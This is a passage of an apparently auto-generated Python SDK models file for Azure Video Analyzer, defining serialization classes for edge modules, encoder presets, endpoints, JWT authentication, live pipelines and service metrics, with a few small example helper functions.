}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'x': {'key': 'x', 'type': 'str'},
'y': {'key': 'y', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EccTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str
self.alg = kwargs['alg']
self.x = kwargs['x']
self.y = kwargs['y']
class EdgeModuleEntity(ProxyResource):
"""The representation of an edge module.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module.
:vartype edge_module_id: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'edge_module_id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntity, self).__init__(**kwargs)
self.edge_module_id = None
class EdgeModuleEntityCollection(msrest.serialization.Model):
"""A collection of EdgeModuleEntity items.
:param value: A collection of EdgeModuleEntity items.
:type value: list[~video_analyzer.models.EdgeModuleEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EdgeModuleEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class EdgeModuleProvisioningToken(msrest.serialization.Model):
"""Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer
IoT edge module must be initialized and connected to the Internet prior to the token expiration
date.
:vartype expiration_date: ~datetime.datetime
:ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through
the Azure IoT Edge module twin properties.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleProvisioningToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class EncoderPresetBase(msrest.serialization.Model):
"""Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderCustomPreset, EncoderSystemPreset.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'}
}
def __init__(
self,
**kwargs
):
super(EncoderPresetBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class EncoderCustomPreset(EncoderPresetBase):
"""Describes a custom preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param audio_encoder: Describes a custom preset for encoding audio.
:type audio_encoder: ~video_analyzer.models.AudioEncoderBase
:param video_encoder: Describes a custom preset for encoding video.
:type video_encoder: ~video_analyzer.models.VideoEncoderBase
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'},
'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderCustomPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str
self.audio_encoder = kwargs.get('audio_encoder', None)
self.video_encoder = kwargs.get('video_encoder', None)
class NodeBase(msrest.serialization.Model):
"""Base class for nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'}
}
def __init__(
self,
**kwargs
):
super(NodeBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.name = kwargs['name']
class ProcessorNodeBase(NodeBase):
"""Base class for topology processor nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderProcessor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'}
}
def __init__(
self,
**kwargs
):
super(ProcessorNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str
self.inputs = kwargs['inputs']
class EncoderProcessor(ProcessorNodeBase):
"""Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param preset: Required. The encoder preset, which defines the recipe or instructions on how
the input content should be processed.
:type preset: ~video_analyzer.models.EncoderPresetBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'preset': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'preset': {'key': 'preset', 'type': 'EncoderPresetBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderProcessor, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str
self.preset = kwargs['preset']
class EncoderSystemPreset(EncoderPresetBase):
"""Describes a built-in preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Name of the built-in encoding preset. Possible values include:
"SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC",
"SingleLayer_2160p_H264_AAC".
:type name: str or ~video_analyzer.models.EncoderSystemPresetType
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EncoderSystemPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str
self.name = kwargs['name']
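# Illustrative sketch (not part of the generated models): a processor node names its upstream
# inputs and carries a preset. EncoderSystemPreset picks one of the built-in recipes, while
# EncoderCustomPreset (above) would combine audio/video encoder settings. NodeInput is declared
# further down in this module; 'rtspSource' is a hypothetical upstream node name.
def _example_encoder_node():
    return EncoderProcessor(
        name='encoderNode',
        inputs=[NodeInput(node_name='rtspSource')],
        preset=EncoderSystemPreset(name='SingleLayer_540p_H264_AAC'),
    )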
class Endpoint(msrest.serialization.Model):
"""The endpoint details.
All required parameters must be populated in order to send to Azure.
:param endpoint_url: The URL of the endpoint.
:type endpoint_url: str
:param type: Required. The type of the endpoint. Possible values include: "ClientApi".
:type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Endpoint, self).__init__(**kwargs)
self.endpoint_url = kwargs.get('endpoint_url', None)
self.type = kwargs['type']
class EndpointBase(msrest.serialization.Model):
"""Base class for endpoints.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: TlsEndpoint, UnsecuredEndpoint.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'}
}
def __init__(
self,
**kwargs
):
super(EndpointBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.credentials = kwargs['credentials']
self.url = kwargs['url']
self.tunnel = kwargs.get('tunnel', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~video_analyzer.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~video_analyzer.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
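# Illustrative sketch (not part of the generated models): ErrorDetail is recursive, so a failed
# operation can be inspected by walking the nested details list.
def _example_flatten_error(response):
    """Yield (code, message) pairs from an ErrorResponse, depth-first."""
    stack = [response.error] if response.error else []
    while stack:
        detail = stack.pop()
        yield detail.code, detail.message
        stack.extend(detail.details or [])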
class GroupLevelAccessControl(msrest.serialization.Model):
"""Group level network access control.
:param public_network_access: Whether or not public network access is allowed for specified
resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
"""
_attribute_map = {
'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(GroupLevelAccessControl, self).__init__(**kwargs)
self.public_network_access = kwargs.get('public_network_access', None)
class IotHub(msrest.serialization.Model):
"""The IoT Hub details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The IoT Hub resource identifier.
:type id: str
:param identity: Required. The IoT Hub identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the IoT Hub mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'identity': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IotHub, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs['identity']
self.status = None
class JwtAuthentication(AuthenticationBase):
"""Properties for access validation based on JSON Web Tokens (JWT).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param issuers: List of expected token issuers. Token issuer is valid if it matches at least
one of the given values.
:type issuers: list[str]
:param audiences: List of expected token audiences. Token audience is valid if it matches at
least one of the given values.
:type audiences: list[str]
:param claims: List of additional token claims to be validated. The token must contain all claims
and respective values for it to be valid.
:type claims: list[~video_analyzer.models.TokenClaim]
:param keys: List of keys which can be used to validate access tokens. Having multiple keys
allows for seamless rotation of the token signing key. The token signature must match exactly
one key.
:type keys: list[~video_analyzer.models.TokenKey]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'issuers': {'key': 'issuers', 'type': '[str]'},
'audiences': {'key': 'audiences', 'type': '[str]'},
'claims': {'key': 'claims', 'type': '[TokenClaim]'},
'keys': {'key': 'keys', 'type': '[TokenKey]'},
}
def __init__(
self,
**kwargs
):
super(JwtAuthentication, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str
self.issuers = kwargs.get('issuers', None)
self.audiences = kwargs.get('audiences', None)
self.claims = kwargs.get('claims', None)
self.keys = kwargs.get('keys', None)
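# Illustrative sketch (not part of the generated models): an access policy combines a role with a
# JWT validation configuration; each TokenKey subclass (EccTokenKey, RsaTokenKey) describes one
# signing key, matched by its 'kid'. The issuer, audience and key values below are hypothetical.
def _example_jwt_access_policy():
    key = EccTokenKey(kid='key-1', alg='ES256', x='<x-coordinate>', y='<y-coordinate>')
    auth = JwtAuthentication(
        issuers=['https://issuer.example.com'],
        audiences=['https://videoanalyzer.example.com'],
        keys=[key],
    )
    return AccessPolicyEntity(role='Reader', authentication=auth)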
class KeyVaultProperties(msrest.serialization.Model):
"""The details for accessing the encryption keys in Key Vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The
key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key
without a version (for example https://vault/keys/mykey).
:type key_identifier: str
:ivar current_key_identifier: The current key used to encrypt the Video Analyzer account, including
the key version.
:vartype current_key_identifier: str
"""
_validation = {
'key_identifier': {'required': True},
'current_key_identifier': {'readonly': True},
}
_attribute_map = {
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_identifier = kwargs['key_identifier']
self.current_key_identifier = None
class ListProvisioningTokenInput(msrest.serialization.Model):
"""The input parameters to generate registration token for the Azure Video Analyzer IoT edge module.
All required parameters must be populated in order to send to Azure.
:param expiration_date: Required. The desired expiration date of the registration token. The
Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to
the token expiration date.
:type expiration_date: ~datetime.datetime
"""
_validation = {
'expiration_date': {'required': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(ListProvisioningTokenInput, self).__init__(**kwargs)
self.expiration_date = kwargs['expiration_date']
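# Illustrative sketch (not part of the generated models): the expiration date is mapped to an
# iso-8601 field; assuming msrest's serializer, a timezone-aware datetime is rendered as an
# ISO 8601 string in the request body. The date below is hypothetical.
def _example_provisioning_token_input():
    import datetime
    expiration = datetime.datetime(2030, 1, 1, tzinfo=datetime.timezone.utc)
    return ListProvisioningTokenInput(expiration_date=expiration)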
class LivePipeline(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipeline, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
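# Illustrative sketch (not part of the generated models): a live pipeline references an existing
# topology by name and supplies per-instance parameter values; 'state' stays None locally because
# only the service transitions it. ParameterDefinition is declared further down in this module;
# the topology, parameter and RTSP URL values below are hypothetical.
def _example_live_pipeline():
    return LivePipeline(
        topology_name='rtsp-to-archive',
        description='Camera 1 archiving pipeline',
        bitrate_kbps=1500,  # allowed range is 500-3000 Kbps, in increments of 100
        parameters=[ParameterDefinition(name='rtspUrl', value='rtsp://camera1.example.com/stream')],
    )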
class LivePipelineCollection(msrest.serialization.Model):
"""A collection of LivePipeline items.
:param value: A collection of LivePipeline items.
:type value: list[~video_analyzer.models.LivePipeline]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[LivePipeline]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class LivePipelineOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the live pipeline.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the live pipeline operation.
:vartype name: str
:ivar status: The status of the live pipeline operation.
:vartype status: str
:ivar error: The error details for the live pipeline operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class LivePipelineUpdate(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LogSpecification(msrest.serialization.Model):
"""A diagnostic log emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The diagnostic log category name.
:vartype name: str
:ivar display_name: The diagnostic log category display name.
:vartype display_name: str
:ivar blob_duration: The time range for requests in each blob.
:vartype blob_duration: str
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'blob_duration': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'blob_duration': {'key': 'blobDuration', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LogSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.blob_duration = None
class MetricDimension(msrest.serialization.Model):
"""A metric dimension.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric dimension name.
:vartype name: str
:ivar display_name: The display name for the dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Whether to export metric to shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'to_be_exported_for_shoebox': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(MetricDimension, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.to_be_exported_for_shoebox = None
class MetricSpecification(msrest.serialization.Model):
"""A metric emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric name.
:vartype name: str
:ivar display_name: The metric display name.
:vartype display_name: str
:ivar display_description: The metric display description.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds".
:vartype unit: str or ~video_analyzer.models.MetricUnit
:ivar aggregation_type: The metric aggregation type. Possible values include: "Average",
"Count", "Total".
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:ivar lock_aggregation_type: The metric lock aggregation type. Possible values include:
"Average", "Count", "Total".
:vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:param supported_aggregation_types: Supported aggregation types.
:type supported_aggregation_types: list[str]
:ivar dimensions: The metric dimensions.
:vartype dimensions: list[~video_analyzer.models.MetricDimension]
:ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled.
:vartype enable_regional_mdm_account: bool
:ivar source_mdm_account: The source MDM account.
:vartype source_mdm_account: str
:ivar source_mdm_namespace: The source MDM namespace.
:vartype source_mdm_namespace: str
:ivar supported_time_grain_types: The supported time grain types.
:vartype supported_time_grain_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'display_description': {'readonly': True},
'unit': {'readonly': True},
'aggregation_type': {'readonly': True},
'lock_aggregation_type': {'readonly': True},
'dimensions': {'readonly': True},
'enable_regional_mdm_account': {'readonly': True},
'source_mdm_account': {'readonly': True},
'source_mdm_namespace': {'readonly': True},
'supported_time_grain_types': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'display_description': {'key': 'displayDescription', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'aggregation_type': {'key': 'aggregationType', 'type': 'str'},
'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'},
'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'},
'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'},
'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'},
'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'},
'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'},
'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MetricSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.display_description = None
self.unit = None
self.aggregation_type = None
self.lock_aggregation_type = None
self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None)
self.dimensions = None
self.enable_regional_mdm_account = None
self.source_mdm_account = None
self.source_mdm_namespace = None
self.supported_time_grain_types = None
class NetworkAccessControl(msrest.serialization.Model):
"""Network access control for video analyzer account.
:param integration: Public network access for integration group.
:type integration: ~video_analyzer.models.GroupLevelAccessControl
:param ingestion: Public network access for ingestion group.
:type ingestion: ~video_analyzer.models.GroupLevelAccessControl
:param consumption: Public network access for consumption group.
:type consumption: ~video_analyzer.models.GroupLevelAccessControl
"""
_attribute_map = {
'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'},
'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'},
'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'},
}
def __init__(
self,
